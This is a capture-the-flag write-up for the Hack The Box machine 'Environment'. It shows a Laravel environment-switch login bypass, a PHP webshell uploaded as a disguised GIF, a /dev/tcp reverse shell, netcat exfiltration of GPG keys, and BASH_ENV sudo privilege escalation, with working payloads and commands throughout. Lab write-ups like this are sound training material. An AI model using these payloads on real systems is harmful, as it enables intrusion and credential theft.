🧧Environment

https://app.hackthebox.com/machines/Environment

Used htbscan script for Recon and checking result of dir/dns/vhost

Recon

[*] Running initial Nmap scan...
sudo nmap -sCV -T4 10.129.186.191 -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 21:27 CEST
Nmap scan report for 10.129.186.191
Host is up (0.027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Did not follow redirect to http://environment.htb
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website

Login-Page

Our recon script shows us a login page

# Dirsearch started Sat May  3 21:36:59 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://environment.htb:80 -e php,html,txt,js,conf,config,bak -t 50 -o web/port_80/environment.htb/dirsearch_results.txt --quiet

403   555B   http://environment.htb/%2e%2e;/test
<snipped>
200     4KB  http://environment.htb/index.php
200     2KB  http://environment.htb/index.php/login/

User

Laravel

Our feroxbuster-scan shows us a upload page:

Configuration {
    kind: "configuration",
    wordlist: "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt",
    config: "/etc/feroxbuster/ferox-config.toml",
    proxy: "",
    replay_proxy: "",
    server_certs: [],
    client_cert: "",
    client_key: "",
    target_url: "http://environment.htb:80",
    status_codes: [
    <snipped>
    405      GET     2575l     8675w   244839c http://environment.htb/upload

• Laravel Version Identified: Laravel 11.30.0

• PHP Version: 8.2.28

• APP_DEBUG=True since we can see the stracktrace

detecting environment=preprod

We can bypass the Login-Page by adding /login?--env=preprod to the url while intercepting the login POST-Request. https://github.com/laravel/framework/security/advisories/GHSA-gv7v-rgg6-548h

POST /login?--env=preprod HTTP/1.1
Host: environment.htb
Content-Length: 98
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://environment.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://environment.htb/login?--env=preprod
Cookie: XSRF-TOKEN=eyJpdiI6IjVJMEtOSWdrelVONzEzNjE5RFpDdkE9PSIsInZhbHVlIjoiblN3R2NYY0pSUVk1V1NHZ3ZRa0lxTXBkZ1dMYWJ6Y1hFUUVGMjJHLzBSRE56ZEVnYjhySGpwNW11ZUZCdmxFZHovY3F6WDA5ckt5bWdsM3lNeEkrVktiVXJGbTEzUUx3ai9KcXNQSGVtL3Rweit0VldmSVhFSUszSjVzYncwWHgiLCJtYWMiOiI4OTI4YjFhYTZhMGQ5ZDg0YzUxMDA5NjNiMDhlNzI4MzVmNjMzNzBmNTNjYWU5NGU1YmQ2NDUyNjc3YzVlZmRkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBQdWR6OG1ZKy9WTVgzYjJyWHVnM2c9PSIsInZhbHVlIjoiMVlFMlNNTDV4ZnVVbnI0SkR6dTNBOUlRSWdiZ0J4cHFjU29rTXgvZ04rVSs3ZElYNU5ma2pUdE50d3lBK1MwS1NJRFEyd2hzZDJjYVZva1hYTTY2S0lNRXlhZW5NQVlMOElFZUlhR1Q5Q0tXK3VWVGlzbWMzNW1wTytHcDYxRC8iLCJtYWMiOiJmMTZmMmVmMmRmMGEzMzYzODY1YjBiYzg1ODY3MjNhNmNmMjVkYzM2NzE1NjQyYmJkZmU3MDdmYTYzNjNmZWUzIiwidGFnIjoiIn0%3D
Connection: keep-alive

<snipped>

Reverse-Shell

We are getting redirected to the dashboad:

Now we gonna upload a webshell as userpicture but we need to bypass some detection.

POST /upload HTTP/1.1
Host: environment.htb
Content-Length: 375
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryztxdKMH8xPKzFn4L
Accept: */*
Origin: http://environment.htb
Referer: http://environment.htb/management/profile
Accept-Encoding: gzip, deflate, br
Cookie: XSRF-TOKEN=eyJpdiI6ImtLU1RTL1lOTU9ydEFEY2pVdTNhaGc9PSIsInZhbHVlIjoib3BieVM3YlRjamN3aGhEZm1CL1pMUWh6YXlkdGNISVlXVnlTVGNJdkZaUVJCWDY4aW1ka3RvY3hqWFFHRDBORnluY2hKYy9GNGI5Y05ZaUttQmo2MXNkaEZzOHVGeU1tNzB1ODJ5YU8wOHRDRHBIZkx1MHg4dGMwMWNVZEZVWnMiLCJtYWMiOiI5MGIzYmJmMjAwYjE3ZjAxNDE5MjFlZGU5NThkNGQyYTI5N2U0ZTNiZGRjNjQ3MDI5NmFhZmY0OTliNWY0ZWRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyUVN1dkEwVlFxMWtTZDFJbTFkYlE9PSIsInZhbHVlIjoiTzdFK1NSbStnamZLUTJIdGNIVWRNQnorV3oxZ28yeXN0LzltY2FUVVA3aUJOVlJuUUNxWGRjTjN5djRxZnB2ajZqWVJrQmQvd3ZDTjFQWlFyNGhEVzFvYVJxMS84RGg0bHZ0T0FuWlVHenBDY09ibCt1dS9jeXp0NkU0UHRlTzYiLCJtYWMiOiIzMjUyYmZlY2ZmZjgzM2FmM2I0YjRkMzlhNzA5NTczNWUxYzcxNjU2OGQxNDUxZmQ1M2FlY2U2ZmEwZjljZTZiIiwidGFnIjoiIn0%3D
Connection: keep-alive

------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="_token"

0izP6cv3a40dMWSXe2S9fFCNdll7KlolLrdzga2E
------WebKitFormBoundaryztxdKMH8xPKzFn4L
Content-Disposition: form-data; name="upload"; filename="simple-backdoor.php."
Content-Type: image/gif

GIF89a;
<?=$_="cmd";@system($_REQUEST[$_]);?>

------WebKitFormBoundaryztxdKMH8xPKzFn4L--

Starting a listener and getting a reverse shell:

➜ rlwrap nc -nlvp 4242                                                                                      │
listening on [any] 4242 ... 
< stuff happen after command below>                                                                                          │
connect to [ip] from (UNKNOWN) [htbip] 55996                                                           │
bash: cannot set terminal process group (930): Inappropriate ioctl for device                                         │
bash: no job control in this shell                                                                                    │
www-data@environment:~/app/storage/app/public/files$ id                                                               │
id                                                                                                                    │
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                 │
www-data@environment:~/app/storage/app/public/files$      

change <yourip>

http://environment.htb/storage/files/simple-backdoor.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/<yourip>/4242+0%3E%261%27

And we get our userflag:

➜ rlwrap nc -nlvp 4242
listening on [any] 4242 ...
connect to [ip] from (UNKNOWN) [htbip] 56386
bash: cannot set terminal process group (964): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ cd /home
cd /home
www-data@environment:/home$ ls
ls
hish
www-data@environment:/home$ cd hish
cd hish
www-data@environment:/home/hish$ ls
ls
backup
user.txt
www-data@environment:/home/hish$ cat user.txt
cat user.txt
<flag>

Root

Continuing in our shell we download the gpg file

www-data@environment:/home/hish$ cd backup
cd backup
www-data@environment:/home/hish/backup$ ls
ls
keyvault.gpg

Attacker-Side

➜ nc -nlvp 4444 > keyvault.gpg
listening on [any] 4444 ...

Victim-Side change <yourip>

www-data@environment:/home/hish/backup$ nc <yourip> 4444 < keyvault.gpg

Ctrl-C on Attacker-Side if you think the file has been transfered, it is quite small should only be some seconds.

Same for the keys

Attacker-Side

nc -lvp 4444 > gnupg.tar

Victim-Side change <yourip>

tar -cvf - /home/hish/.gnupg | nc <your_local_ip> 4444

➜ tar -xvf gnupg.tar
home/hish/.gnupg/                                                                                                                                                                                                                           
home/hish/.gnupg/private-keys-v1.d/                                                                                                                                                                                                         
home/hish/.gnupg/private-keys-v1.d/C2DF4CF8B7B94F1EEC662473E275A0E483A95D24.key                                                                                                                                                             
home/hish/.gnupg/private-keys-v1.d/3B966A35D4A711F02F64B80E464133B0F0DBCB04.key                                                                                                                                                             
home/hish/.gnupg/trustdb.gpg                                                                                                                                                                                                                
home/hish/.gnupg/pubring.kbx                                                                                                                                                                                                                
home/hish/.gnupg/openpgp-revocs.d/                                                                                                                                                                                                          
home/hish/.gnupg/openpgp-revocs.d/F45830DFB638E66CD8B752A012F42AE5117FFD8E.rev                                                                                                                                                              
home/hish/.gnupg/pubring.kbx~                                                                                                                                                                                                               
home/hish/.gnupg/random_seed  

➜ mv ~/.gnupg/ /tmp       
➜ mv ./home/hish/.gnupg ~
➜ gpg --decrypt keyvault.gpg      

gpg: WARNING: unsafe permissions on homedir '/home/kali/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
      "hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

move you gnupg-folder back afterwards:

➜ rm -rf ~/.gnupg 
➜ mv /tmp/.gnupg ~

Login in using that credentials

➜ ssh hish@environment.htb
hish@environment.htb's password: marineSPm@ster!!
Linux environment 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 4 18:07:17 2025 from 

Checking what we can do and checking the scripts

hish@environment:~$ sudo -l
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
hish@environment:~$ file /usr/bin/systeminfo
/usr/bin/systeminfo: Bourne-Again shell script, ASCII text executable
hish@environment:~$ ls -l /usr/bin/systeminfo
-rwxr-xr-x 1 root root 452 Jan 12 12:11 /usr/bin/systeminfo
hish@environment:~$ head -n 10 /usr/bin/systeminfo
#!/bin/bash
echo -e "\n### Displaying kernel ring buffer logs (dmesg) ###"
dmesg | tail -n 10

echo -e "\n### Checking system-wide open ports ###"
ss -antlp

echo -e "\n### Displaying information about all mounted filesystems ###"
mount | column -t

The script /usr/bin/systeminfo is a bash script run as root, and it uses unsanitized system commands like dmesg, ss, mount, and column.

This means you can do a PATH hijack attack, because sudo will preserve env_keep+="ENV BASH_ENV"

echo 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.sh ; chmod +x /tmp/root.sh ; env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfo

Hijacking Path with BASH_ENV

Here’s how:

1. /tmp/root.sh Hijack: The echo 'echo "BASH_ENV sourced as root!"; id; /bin/bash -p' > /tmp/root.sh command creates a new script at /tmp/root.sh. The contents of this file:

   echo "BASH_ENV sourced as root!"
   id
   /bin/bash -p

• The first line will print a message indicating that BASH_ENV has been sourced.

• The second line (id) will show the user ID, which should show root when executed with elevated privileges.

• The third line (/bin/bash -p) will start a new interactive root shell with the -p flag, which preserves the environment and avoids resetting some environment variables that may give you additional access.

1. Exploiting with env -i and sudo:

The command:

env -i BASH_ENV=/tmp/root.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo /usr/bin/systeminfo

• env -i runs a command with a clean environment (i.e., clears all environment variables except those explicitly passed).

• BASH_ENV=/tmp/root.sh sets the BASH_ENV variable to point to the malicious script /tmp/root.sh.

• The PATH variable is set to the default system PATH, which is fine for running standard commands, including sudo and /usr/bin/systeminfo.

• sudo runs the systeminfo script with root privileges, but now the BASH_ENV is set to /tmp/root.sh, so the malicious script is sourced, and the root shell is spawned.

Why This Works

• sudo does not reset BASH_ENV: When you run sudo, it typically does not reset the BASH_ENV variable unless explicitly configured to do so in the sudoers file. This allows you to control the environment in which systeminfo is executed, giving you the ability to inject your own commands as root.

• Bypass Restrictions: The use of env -i to clear the environment variables except for BASH_ENV and PATH is crucial here. It prevents any other environment variables that might be present from interfering with your exploit.